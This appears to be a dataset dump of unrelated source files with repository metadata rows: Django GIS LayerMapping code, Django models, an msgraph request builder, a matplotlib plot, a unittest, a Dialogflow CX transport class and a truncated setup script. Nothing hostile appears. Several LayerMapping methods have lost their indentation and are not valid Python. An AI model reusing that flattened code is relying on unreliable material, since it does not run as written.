            raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
        return idx

    # No need to increment through each feature in the model, simply check
    # the Layer metadata against what was given in the mapping dictionary.
    for field_name, ogr_name in self.mapping.items():
        # Ensuring that a corresponding field exists in the model
        # for the given field name in the mapping.
        try:
            model_field = self.model._meta.get_field(field_name)
        except FieldDoesNotExist:
            raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)

        # Getting the string name for the Django field class (e.g., 'PointField').
        fld_name = model_field.__class__.__name__

        if isinstance(model_field, GeometryField):
            if self.geom_field:
                raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')

            # Getting the coordinate dimension of the geometry field.
            coord_dim = model_field.dim

            try:
                # 3D fields map to the OGR "25D" geometry variants.
                if coord_dim == 3:
                    gtype = OGRGeomType(ogr_name + '25D')
                else:
                    gtype = OGRGeomType(ogr_name)
            except GDALException:
                raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)

            # Making sure that the OGR Layer's Geometry is compatible.
            ltype = self.layer.geom_type
            if not (ltype.name.startswith(gtype.name) or self.make_multi(ltype, model_field)):
                raise LayerMapError('Invalid mapping geometry; model has %s%s, '
                                    'layer geometry type is %s.' %
                                    (fld_name, '(dim=3)' if coord_dim == 3 else '', ltype))

            # Setting the `geom_field` attribute w/the name of the model field
            # that is a Geometry.  Also setting the coordinate dimension
            # attribute.
            self.geom_field = field_name
            self.coord_dim = coord_dim
            fields_val = model_field
        elif isinstance(model_field, models.ForeignKey):
            if isinstance(ogr_name, dict):
                # Is every given related model mapping field in the Layer?
                rel_model = model_field.remote_field.model
                for rel_name, ogr_field in ogr_name.items():
                    idx = check_ogr_fld(ogr_field)
                    try:
                        rel_model._meta.get_field(rel_name)
                    except FieldDoesNotExist:
                        raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
                                            (rel_name, rel_model.__class__.__name__))
                fields_val = rel_model
            else:
                raise TypeError('ForeignKey mapping must be of dictionary type.')
        else:
            # Is the model field type supported by LayerMapping?
            if model_field.__class__ not in self.FIELD_TYPES:
                raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)

            # Is the OGR field in the Layer?
            idx = check_ogr_fld(ogr_name)
            ogr_field = ogr_field_types[idx]

            # Can the OGR field type be mapped to the Django field type?
            if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
                raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
                                    (ogr_field, ogr_field.__name__, fld_name))
            fields_val = model_field

        self.fields[field_name] = fields_val
def check_srs(self, source_srs):
    "Checks the compatibility of the given spatial reference object."
    # Accepts a SpatialReference, a spatial_ref_sys model instance, an
    # SRID/WKT/proj string, or None (fall back to the layer's own SRS).
    if isinstance(source_srs, SpatialReference):
        sr = source_srs
    elif isinstance(source_srs, self.spatial_backend.spatial_ref_sys()):
        sr = source_srs.srs
    elif isinstance(source_srs, (int, six.string_types)):
        sr = SpatialReference(source_srs)
    else:
        # Otherwise just pulling the SpatialReference from the layer
        sr = self.layer.srs
    if not sr:
        raise LayerMapError('No source reference system defined.')
    else:
        return sr
def check_unique(self, unique):
    "Checks the `unique` keyword parameter -- may be a sequence or string."
    if isinstance(unique, (list, tuple)):
        # List of fields to determine uniqueness with; each must be mapped.
        for attr in unique:
            if attr not in self.mapping:
                raise ValueError
    elif isinstance(unique, six.string_types):
        # Only a single field passed in.
        if unique not in self.mapping:
            raise ValueError
    else:
        raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
# Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
try:
val = self.verify_geom(feat.geom, model_field)
except GDALException:
raise LayerMapError('Could not retrieve geometry from feature.')
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, six.string_types):
return {self.unique: kwargs[self.unique]}
else:
return {fld: kwargs[fld] for fld in self.unique}
# #### Verification routines used in constructing model keyword arguments. ####
    def verify_ogr_field(self, ogr_field, model_field):
        """
        Verifies if the OGR Field contents are acceptable to the Django
        model field. If they are, the verified value is returned,
        otherwise the proper exception is raised.
        """
        if (isinstance(ogr_field, OFTString) and
                isinstance(model_field, (models.CharField, models.TextField))):
            if self.encoding:
                # The encoding for OGR data sources may be specified here
                # (e.g., 'cp437' for Census Bureau boundary files).
                val = force_text(ogr_field.value, self.encoding)
            else:
                val = ogr_field.value
            if model_field.max_length and len(val) > model_field.max_length:
                raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
                                    (model_field.name, model_field.max_length, len(val)))
        elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
            try:
                # Creating an instance of the Decimal value to use.
                d = Decimal(str(ogr_field.value))
            except DecimalInvalidOperation:
                raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
            # Getting the decimal value as a tuple.
            # as_tuple() yields (sign, digits, exponent).
            dtup = d.as_tuple()
            digits = dtup[1]
            d_idx = dtup[2]  # index where the decimal is
            # Maximum amount of precision, or digits to the left of the decimal.
            max_prec = model_field.max_digits - model_field.decimal_places
            # Getting the digits to the left of the decimal place for the
            # given decimal.
            if d_idx < 0:
                # Negative exponent: drop the fractional digits from the count.
                n_prec = len(digits[:d_idx])
            else:
                # Non-negative exponent: all digits are integral, plus trailing zeros.
                n_prec = len(digits) + d_idx
            # If we have more than the maximum digits allowed, then throw an
            # InvalidDecimal exception.
            if n_prec > max_prec:
                raise InvalidDecimal(
                    'A DecimalField with max_digits %d, decimal_places %d must '
                    'round to an absolute value less than 10^%d.' %
                    (model_field.max_digits, model_field.decimal_places, max_prec)
                )
            val = d
        elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
            # Attempt to convert any OFTReal and OFTString value to an OFTInteger.
            try:
                val = int(ogr_field.value)
            except ValueError:
                raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
        else:
            # All other combinations pass the raw OGR value through unchanged.
            val = ogr_field.value
        return val
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.using(self.using).get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey(
'No ForeignKey %s model found with keyword arguments: %s' %
(rel_model.__name__, fk_kwargs)
)
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
# Downgrade a 3D geom to a 2D one, if necessary.
if self.coord_dim != geom.coord_dim:
geom.coord_dim = self.coord_dim
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform:
g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
# #### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
SpatialRefSys = self.spatial_backend.spatial_ref_sys()
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.using(self.using).get(srid=self.geo_field.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception as msg:
new_msg = 'Could not translate between the data source and model geometry: %s' % msg
six.reraise(LayerMapError, LayerMapError(new_msg), sys.exc_info()[2])
def geometry_field(self):
"Returns the GeometryField instance associated with the geographic column."
# Use `get_field()` on the model's options so that we
# get the correct field instance if there's model inheritance.
opts = self.model._meta
return opts.get_field(self.geom_field)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
    def save(self, verbose=False, fid_range=False, step=False,
             progress=False, silent=False, stream=sys.stdout, strict=False):
        """
        Saves the contents from the OGR DataSource Layer into the database
        according to the mapping dictionary given at initialization.
        Keyword Parameters:
         verbose:
           If set, information will be printed subsequent to each model save
           executed on the database.
         fid_range:
           May be set with a slice or tuple of (begin, end) feature ID's to map
           from the data source. In other words, this keyword enables the user
           to selectively import a subset range of features in the geographic
           data source.
         step:
           If set with an integer, transactions will occur at every step
           interval. For example, if step=1000, a commit would occur after
           the 1,000th feature, the 2,000th feature etc.
         progress:
           When this keyword is set, status information will be printed giving
           the number of features processed and successfully saved. By default,
           progress information will be printed every 1000 features processed,
           however, this default may be overridden by setting this keyword with an
           integer for the desired interval.
         stream:
           Status information will be written to this file handle. Defaults to
           using `sys.stdout`, but any object with a `write` method is supported.
         silent:
           By default, non-fatal error notifications are printed to stdout, but
           this keyword may be set to disable these notifications.
         strict:
           Execution of the model mapping will cease upon the first error
           encountered. The default behavior is to attempt to continue.
        """
        # Getting the default Feature ID range.
        default_range = self.check_fid_range(fid_range)
        # Setting the progress interval, if requested.
        if progress:
            if progress is True or not isinstance(progress, int):
                progress_interval = 1000
            else:
                progress_interval = progress
        # Inner worker: maps and saves every feature in `feat_range`,
        # returning the updated counters so incremental (stepped) runs can
        # carry totals across calls.
        def _save(feat_range=default_range, num_feat=0, num_saved=0):
            if feat_range:
                layer_iter = self.layer[feat_range]
            else:
                layer_iter = self.layer
            for feat in layer_iter:
                num_feat += 1
                # Getting the keyword arguments
                try:
                    kwargs = self.feature_kwargs(feat)
                except LayerMapError as msg:
                    # Something borked the validation
                    if strict:
                        raise
                    elif not silent:
                        stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
                else:
                    # Constructing the model using the keyword args
                    is_update = False
                    if self.unique:
                        # If we want unique models on a particular field, handle the
                        # geometry appropriately.
                        try:
                            # Getting the keyword arguments and retrieving
                            # the unique model.
                            u_kwargs = self.unique_kwargs(kwargs)
                            m = self.model.objects.using(self.using).get(**u_kwargs)
                            is_update = True
                            # Getting the geometry (in OGR form), creating
                            # one from the kwargs WKT, adding in additional
                            # geometries, and update the attribute with the
                            # just-updated geometry WKT.
                            geom = getattr(m, self.geom_field).ogr
                            new = OGRGeometry(kwargs[self.geom_field])
                            for g in new:
                                geom.add(g)
                            setattr(m, self.geom_field, geom.wkt)
                        except ObjectDoesNotExist:
                            # No unique model exists yet, create.
                            m = self.model(**kwargs)
                    else:
                        m = self.model(**kwargs)
                    try:
                        # Attempting to save.
                        m.save(using=self.using)
                        num_saved += 1
                        if verbose:
                            stream.write('%s: %s\n' % ('Updated' if is_update else 'Saved', m))
                    except Exception as msg:
                        if strict:
                            # Bailing out if the `strict` keyword is set.
                            if not silent:
                                stream.write(
                                    'Failed to save the feature (id: %s) into the '
                                    'model with the keyword arguments:\n' % feat.fid
                                )
                                stream.write('%s\n' % kwargs)
                            raise
                        elif not silent:
                            stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
                # Printing progress information, if requested.
                if progress and num_feat % progress_interval == 0:
                    stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
            # Only used for status output purposes -- incremental saving uses the
            # values returned here.
            return num_saved, num_feat
        # Wrap _save in a per-call transaction when the backend supports it.
        if self.transaction_decorator is not None:
            _save = self.transaction_decorator(_save)
        nfeat = self.layer.num_feat
        if step and isinstance(step, int) and step < nfeat:
            # Incremental saving is requested at the given interval (step)
            if default_range:
                raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
            beg, num_feat, num_saved = (0, 0, 0)
            indices = range(step, nfeat, step)
            n_i = len(indices)
            for i, end in enumerate(indices):
                # Constructing the slice to use for this step; the last slice is
                # special (e.g, [100:] instead of [90:100]).
                if i + 1 == n_i:
                    step_slice = slice(beg, None)
                else:
                    step_slice = slice(beg, end)
                try:
                    num_feat, num_saved = _save(step_slice, num_feat, num_saved)
                    beg = end
                except Exception:  # Deliberately catch everything
                    stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
                    raise
        else:
            # Otherwise, just calling the previously defined _save() function.
            _save()
| [
"root@debian"
] | root@debian |
55b52b8988367a4f538993e31d1b68bc5744700d | 636fae2d4fa7108c3cc30d55c9feef6dfd334cd8 | /NestedSerializer/api/models.py | d8890ec995bbea37c679ff6e986db7c5e1f2e14e | [] | no_license | anupjungkarki/Django-RESTFramework | 4ee3f5a46a98854284b45545d751822e27a715e1 | dc774c234de09f7e26c7fd5b84ba9359ecc75861 | refs/heads/master | 2023-02-15T02:34:46.421764 | 2021-01-11T08:04:15 | 2021-01-11T08:04:15 | 327,276,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | from django.db import models
# Create your models here.
class Singer(models.Model):
    # Display name of the singer.
    name = models.CharField(max_length=100)
    # Gender label, stored as free text.
    gender = models.CharField(max_length=100)
    def __str__(self):
        """Return the singer's name for human-readable representations."""
        return self.name
class Track(models.Model):
    # Title of the track.
    title = models.CharField(max_length=100)
    # Owning singer; `related_name='song'` lets singers access their tracks
    # via `singer.song`.  Deleting the singer cascades to the tracks.
    singer = models.ForeignKey(Singer, on_delete=models.CASCADE, related_name='song')
    # Album the track belongs to, stored as free text.
    album = models.CharField(max_length=100)
    # Duration of the track (units not specified here; presumably seconds --
    # TODO confirm against callers).
    duration = models.IntegerField()
    def __str__(self):
        """Return the track title for human-readable representations."""
        return self.title
| [
"anupkarki2012@gmail.com"
] | anupkarki2012@gmail.com |
c80f313a023ea0d6910870d6c5fbb40985a35628 | 00faae803cfa2e5c2f5e662f560eb61bd0074690 | /src/python2/request/item_attachment_request_builder.py | 998217a7f8acc20f524fc5a161c255abfc56cb1c | [
"MIT"
] | permissive | gojohnkevin/msgraph-sdk-python | 6dc00723489eddf013cff82d34d86d677b4d7ecf | 7714c11043e76e856876dd731c6c1df7b37cdbef | refs/heads/master | 2022-07-09T14:35:30.422531 | 2022-06-23T15:52:17 | 2022-06-23T15:52:17 | 85,160,734 | 0 | 1 | null | 2017-03-16T06:29:59 | 2017-03-16T06:29:59 | null | UTF-8 | Python | false | false | 3,157 | py | # -*- coding: utf-8 -*-
"""
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
"""
from __future__ import unicode_literals
from .item_attachment_request import ItemAttachmentRequest
from ..request_builder_base import RequestBuilderBase
from ..request import outlook_item_request_builder
class ItemAttachmentRequestBuilder(RequestBuilderBase):
    """Builds requests addressing a single ItemAttachment resource."""

    def __init__(self, request_url, client):
        """Initialize the ItemAttachmentRequestBuilder.

        Args:
            request_url (str): The url to perform the ItemAttachmentRequest
                on
            client (:class:`GraphClient<microsoft.msgraph.request.graph_client.GraphClient>`):
                The client which will be used for the request
        """
        super(ItemAttachmentRequestBuilder, self).__init__(request_url, client)

    def request(self, expand=None, select=None, options=None):
        """Build an ItemAttachmentRequest with the given OData query options.

        Args:
            expand (str): Default None, comma-separated list of relationships
                to expand in the response.
            select (str): Default None, comma-separated list of properties to
                include in the response.
            options (list of :class:`Option<microsoft.msgraph.options.Option>`):
                A list of options to pass into the request. Defaults to None.

        Returns:
            :class:`ItemAttachmentRequest<microsoft.msgraph.request.item_attachment_request.ItemAttachmentRequest>`:
                The ItemAttachmentRequest
        """
        built = ItemAttachmentRequest(self._request_url, self._client, options)
        built._set_query_options(expand=expand, select=select)
        return built

    def delete(self):
        """Delete the specified ItemAttachment."""
        self.request().delete()

    def get(self):
        """Fetch the specified ItemAttachment.

        Returns:
            :class:`ItemAttachment<microsoft.msgraph.model.item_attachment.ItemAttachment>`:
                The ItemAttachment.
        """
        return self.request().get()

    def update(self, item_attachment):
        """Update the specified ItemAttachment.

        Args:
            item_attachment (:class:`ItemAttachment<microsoft.msgraph.model.item_attachment.ItemAttachment>`):
                The ItemAttachment to update.

        Returns:
            :class:`ItemAttachment<microsoft.msgraph.model.item_attachment.ItemAttachment>`:
                The updated ItemAttachment
        """
        return self.request().update(item_attachment)

    @property
    def item(self):
        """Request builder for this attachment's `item` navigation property.

        Returns:
            :class:`OutlookItemRequestBuilder<microsoft.msgraph.request.outlook_item_request.OutlookItemRequestBuilder>`:
                A request builder created from the ItemAttachmentRequestBuilder
        """
        item_url = self.append_to_request_url("item")
        return outlook_item_request_builder.OutlookItemRequestBuilder(item_url, self._client)
| [
"robert.anderson@microsoft.com"
] | robert.anderson@microsoft.com |
67ac08f194336d675fc9d64d633658f8fd86b045 | 8f6a9ff4c63fd24d145088077d5da1c3e4caaa3a | /code/fv_show.py | bec775f7e12c9d5a361048b6fb24b83528b2fb7c | [] | no_license | liaofuwei/pythoncoding | 6fd2afba0d27c4a4bbb4b2d321b3fa402a60d6fe | 966bd99459be933cf48287412a40e0c7a3d0b8e5 | refs/heads/master | 2021-07-15T10:34:57.701528 | 2017-10-10T05:27:13 | 2017-10-10T05:27:13 | 107,651,470 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | import numpy as np
from matplotlib.pyplot import *
from pylab import *
# Future value of a lump-sum investment under annual compounding:
#   FV = PV * (1 + r) ** t
principal = 1000       # present value
annual_rate = 0.08     # yearly interest rate
years = linspace(0, 10, 10)
future_value = principal * (1 + annual_rate) ** years
plot(years, future_value)
show()
| [
"459193023@qq.com"
] | 459193023@qq.com |
a248fff8e70b831ad000f09123fad1ffa2eeeac6 | c1b8ff60ed4d8c70e703f71b7c96a649a75c0cec | /ostPython2/FTL_tester.py | ed22531b4ea6f2f193bd5c2a0186bb3d3106022b | [] | no_license | deepbsd/OST_Python | 836d4fae3d98661a60334f66af5ba3255a0cda5c | b32f83aa1b705a5ad384b73c618f04f7d2622753 | refs/heads/master | 2023-02-14T17:17:28.186060 | 2023-01-31T02:09:05 | 2023-01-31T02:09:05 | 49,534,454 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,800 | py | #!/usr/local/bin/python3
#
# File Type Lister Tester (FTL_tester.py)
# (tests FileTypeLister.py module)
#
# by David S. Jackson
# for OST Python 2 on Jan 15, 2015
#
# Instructor Pat Barton
#
"""This program calls the unittest module and tests the accuracy
of the program called FileTypeLister.py. This module lists all
files in the designated directory (dirpath) by suffix and counts
the number of occurances for each file type according to suffix.
This unittest tests the accuracy of that program with some tests.
"""
import os
import glob
import random
import unittest
import tempfile
import FileTypeLister
# File suffixes used to generate one test file of each type.
suf = ['.py','.txt','.doc','.wp','.lts','.gpg','.jpg',\
'.gif','.html','.pl','.sh','.mp3','.mp4','.bin']
# Base names combined with an index and a suffix to form file names.
bname = ['one','two','three','four','five','six',\
'seven','eight','nine','ten','eleven','twelve']
class TestFTL(unittest.TestCase):
    """Tests the FileTypeLister.py program."""

    def setUp(self):
        """Create a temp dir full of files with various suffixes,
        using the randint() function to pick the per-name file count.
        """
        global file_count
        file_count = random.randint(20, 50)
        global dirname
        dirname = tempfile.mkdtemp("tempdir")
        os.chdir(dirname)
        for filenum in range(0, file_count):
            for suffix in suf:
                for base in bname:
                    filename = base + str(filenum) + suffix
                    # Context manager guarantees the handle is closed even
                    # if the write fails (the original left handles to the
                    # garbage collector).
                    with open(filename, 'w') as f:
                        f.write("whatever whatever whatever\n")

    def test_1(self):
        """Verify that total files listed in tempdir is correct
        and agrees with suf_dict
        """
        suf_dict = FileTypeLister.listFiles(dirname)
        # Sum the per-suffix counts reported by FileTypeLister.
        ftl_total = sum(int(value) for value in suf_dict.values())
        # setUp creates one file per (base name, suffix, index) triple.
        total_files = len(bname) * len(suf) * file_count
        self.assertEqual(ftl_total, total_files, "Doesn't list correct number of files.")

    def test_2(self):
        "Verify that suf_dict is accurate for files in tempdir"
        suf_dict = FileTypeLister.listFiles(dirname)
        # Every suffix should have exactly one file per base name per index.
        for suffix, value in suf_dict.items():
            self.assertEqual(suf_dict[suffix], len(bname)*file_count, "Totals wrong for {}".format(suf_dict[suffix]))

    def tearDown(self):
        """Remove the generated files and the temporary directory."""
        os.chdir(dirname)
        for fn in glob.glob('*'):
            os.remove(fn)
        # Leave the directory before deleting it: os.rmdir() fails on some
        # platforms when the target is the current working directory, and the
        # bare `except OSError: pass` below silently leaked the temp dir on
        # every run there.
        os.chdir(tempfile.gettempdir())
        try:
            os.rmdir(dirname)
        except OSError:
            pass
if __name__ == "__main__":
    # Run the test suite when this module is executed directly.
    unittest.main()
| [
"deepbsd@yahoo.com"
] | deepbsd@yahoo.com |
7e411cb789425e93b5e414dc5fe79e491c5a3eac | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/dialogflow/cx/v3/dialogflow-cx-v3-py/google/cloud/dialogflowcx_v3/services/agents/transports/base.py | 48cfc1c41a55ee13a499105dde3b235955c93c4d | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,003 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.dialogflowcx_v3.types import agent
from google.cloud.dialogflowcx_v3.types import agent as gcdc_agent
from google.longrunning import operations_pb2 as operations # type: ignore
from google.protobuf import empty_pb2 as empty # type: ignore
try:
    # Derive the client info (user-agent metadata) from the installed
    # package version.
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution(
            'google-cloud-dialogflowcx',
        ).version,
    )
except pkg_resources.DistributionNotFound:
    # Package metadata unavailable (e.g. running from source) -- fall back
    # to the default client info.
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class AgentsTransport(abc.ABC):
    """Abstract transport class for Agents."""

    # OAuth scopes requested when building default credentials.
    AUTH_SCOPES = (
        'https://www.googleapis.com/auth/cloud-platform',
        'https://www.googleapis.com/auth/dialogflow',
    )

    def __init__(
            self, *,
            host: str = 'dialogflow.googleapis.com',
            credentials: credentials.Credentials = None,
            credentials_file: typing.Optional[str] = None,
            scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
            quota_project_id: typing.Optional[str] = None,
            client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
            **kwargs,
            ) -> None:
        """Instantiate the transport.

        Args:
            host (Optional[str]): The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is mutually exclusive with credentials.
            scope (Optional[Sequence[str]]): A list of scopes.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
        """
        # Save the hostname. Default to port 443 (HTTPS) if none is specified.
        if ':' not in host:
            host += ':443'
        self._host = host

        # Save the scopes.
        self._scopes = scopes or self.AUTH_SCOPES

        # If no credentials are provided, then determine the appropriate
        # defaults.
        if credentials and credentials_file:
            raise exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive")

        if credentials_file is not None:
            # Load credentials (e.g. a service-account key) from the file.
            credentials, _ = auth.load_credentials_from_file(
                                credentials_file,
                                scopes=self._scopes,
                                quota_project_id=quota_project_id
                            )
        elif credentials is None:
            # Fall back to Application Default Credentials.
            credentials, _ = auth.default(scopes=self._scopes, quota_project_id=quota_project_id)

        # Save the credentials.
        self._credentials = credentials

    def _prep_wrapped_messages(self, client_info):
        # Precompute the wrapped methods.
        # Each RPC is wrapped with default timeout/retry metadata once, up
        # front, rather than on every call.
        self._wrapped_methods = {
            self.list_agents: gapic_v1.method.wrap_method(
                self.list_agents,
                default_timeout=None,
                client_info=client_info,
            ),
            self.get_agent: gapic_v1.method.wrap_method(
                self.get_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.create_agent: gapic_v1.method.wrap_method(
                self.create_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.update_agent: gapic_v1.method.wrap_method(
                self.update_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.delete_agent: gapic_v1.method.wrap_method(
                self.delete_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.export_agent: gapic_v1.method.wrap_method(
                self.export_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.restore_agent: gapic_v1.method.wrap_method(
                self.restore_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.validate_agent: gapic_v1.method.wrap_method(
                self.validate_agent,
                default_timeout=None,
                client_info=client_info,
            ),
            self.get_agent_validation_result: gapic_v1.method.wrap_method(
                self.get_agent_validation_result,
                default_timeout=None,
                client_info=client_info,
            ),
        }

    @property
    def operations_client(self) -> operations_v1.OperationsClient:
        """Return the client designed to process long-running operations."""
        raise NotImplementedError()

    # Each RPC below is exposed as a property returning a callable; concrete
    # (sync or async) transports override these with real stubs.
    @property
    def list_agents(self) -> typing.Callable[
            [agent.ListAgentsRequest],
            typing.Union[
                agent.ListAgentsResponse,
                typing.Awaitable[agent.ListAgentsResponse]
            ]]:
        raise NotImplementedError()

    @property
    def get_agent(self) -> typing.Callable[
            [agent.GetAgentRequest],
            typing.Union[
                agent.Agent,
                typing.Awaitable[agent.Agent]
            ]]:
        raise NotImplementedError()

    @property
    def create_agent(self) -> typing.Callable[
            [gcdc_agent.CreateAgentRequest],
            typing.Union[
                gcdc_agent.Agent,
                typing.Awaitable[gcdc_agent.Agent]
            ]]:
        raise NotImplementedError()

    @property
    def update_agent(self) -> typing.Callable[
            [gcdc_agent.UpdateAgentRequest],
            typing.Union[
                gcdc_agent.Agent,
                typing.Awaitable[gcdc_agent.Agent]
            ]]:
        raise NotImplementedError()

    @property
    def delete_agent(self) -> typing.Callable[
            [agent.DeleteAgentRequest],
            typing.Union[
                empty.Empty,
                typing.Awaitable[empty.Empty]
            ]]:
        raise NotImplementedError()

    @property
    def export_agent(self) -> typing.Callable[
            [agent.ExportAgentRequest],
            typing.Union[
                operations.Operation,
                typing.Awaitable[operations.Operation]
            ]]:
        raise NotImplementedError()

    @property
    def restore_agent(self) -> typing.Callable[
            [agent.RestoreAgentRequest],
            typing.Union[
                operations.Operation,
                typing.Awaitable[operations.Operation]
            ]]:
        raise NotImplementedError()

    @property
    def validate_agent(self) -> typing.Callable[
            [agent.ValidateAgentRequest],
            typing.Union[
                agent.AgentValidationResult,
                typing.Awaitable[agent.AgentValidationResult]
            ]]:
        raise NotImplementedError()

    @property
    def get_agent_validation_result(self) -> typing.Callable[
            [agent.GetAgentValidationResultRequest],
            typing.Union[
                agent.AgentValidationResult,
                typing.Awaitable[agent.AgentValidationResult]
            ]]:
        raise NotImplementedError()
# Public API of this module.
__all__ = (
    'AgentsTransport',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
8d4472313788528fd9bfe6d9946eaddceff01a1e | f3b233e5053e28fa95c549017bd75a30456eb50c | /bace_input/L4L/4L-3K_MD_NVT_rerun/set_5.py | 3e085633cdd1777fcdab3329d33720e37d1264e9 | [] | no_license | AnguseZhang/Input_TI | ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | 50ada0833890be9e261c967d00948f998313cb60 | refs/heads/master | 2021-05-25T15:02:38.858785 | 2020-02-18T16:57:04 | 2020-02-18T16:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 740 | py | import os
dir = '/mnt/scratch/songlin3/run/bace/L4L/MD_NVT_rerun/ti_one-step/4L_3K/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_5.in'
temp_pbs = filesdir + 'temp_5.pbs'
